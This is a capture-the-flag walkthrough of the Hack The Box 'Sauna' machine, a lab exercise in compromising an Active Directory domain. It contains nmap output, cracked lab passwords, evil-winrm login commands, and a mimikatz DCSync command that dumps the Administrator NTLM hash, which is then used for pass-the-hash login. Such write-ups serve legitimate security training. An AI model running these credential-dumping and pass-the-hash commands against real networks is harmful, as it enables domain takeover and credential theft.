Hack The Box - Sauna

https://raw.githubusercontent.com/CsEnox/csenox.github.io/master/img/Sauna%20Box%2030605ca311aa474389359e585ddf6bd6/Untitled.png

Sauna Box Walkthrough

NMAP:

Nmap scan report for 10.10.10.175
Host is up (0.19s latency).
Not shown: 988 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-07-18 11:59:22Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped

Enumerating and Kerberoasting

=> On the website we find the following employees names :

https://camo.githubusercontent.com/85011b15d9cd02aab69782b2bb45f58a0cb5ac35/68747470733a2f2f692e696d6775722e636f6d2f543232695477532e706e67

=> Lets make an usernames file using this information :

Fsmith
Scoins
Hbear
Btaylor
Sdriver
Skerb

=> Now we will run kerbrute to find valid users and then try kerberoasting it

https://camo.githubusercontent.com/9ac8939cbacac8c00adaeb8851e0899d4241a38b/68747470733a2f2f692e696d6775722e636f6d2f487673306a55422e706e67

https://camo.githubusercontent.com/c25012b543ddd45f7c9d05b4b5770256e20e44b4/68747470733a2f2f692e696d6775722e636f6d2f344a4e787164482e706e67

Cracking it we get the password : Thestrokes23

=> Lets login with evil-winrm.

evil-winrm -u fsmith -p Thestrokes23 -i 10.10.10.175


Privilege Escalation [ DCSync Attack ]

https://camo.githubusercontent.com/e523e0c0ae61ddf0df430f4d9533d3a4d40f1d18/68747470733a2f2f692e696d6775722e636f6d2f7a6962424244662e706e67

=> Lets switch to the 2nd user we found.

evil-winrm -u svc_loanmgr -p Moneymakestheworldgoround! -i 10.10.10.175

=> Running bloodhound we find that our user has GetChangesAll privileges.

https://camo.githubusercontent.com/c1d7aba200a72ef0b409a892de8d66701658f93f/68747470733a2f2f692e696d6775722e636f6d2f724e6d744174612e706e67

=> Lets upload mimikatz and perform dcsync attack : https://github.com/gentilkiwi/mimikatz

./mimikatz.exe “lsadump::dcsync /user:Administrator” “exit”

=> We get the Administrator NTLM Hash which we can use to authenticate :

https://camo.githubusercontent.com/cd7b49123826d15df3905daf4fb86113d815e44f/68747470733a2f2f692e696d6775722e636f6d2f554b6a684866552e706e67

NTLM:d9485863c1e9e05851aa40cbb4ab9dff

=> Lets switch to Administrator :

evil-winrm -u Administrator -H d9485863c1e9e05851aa40cbb4ab9dff -i 10.10.10.175

https://camo.githubusercontent.com/5e284e73819940089aeddc945a9dfe5d78170705/68747470733a2f2f692e696d6775722e636f6d2f4b464d434149572e706e67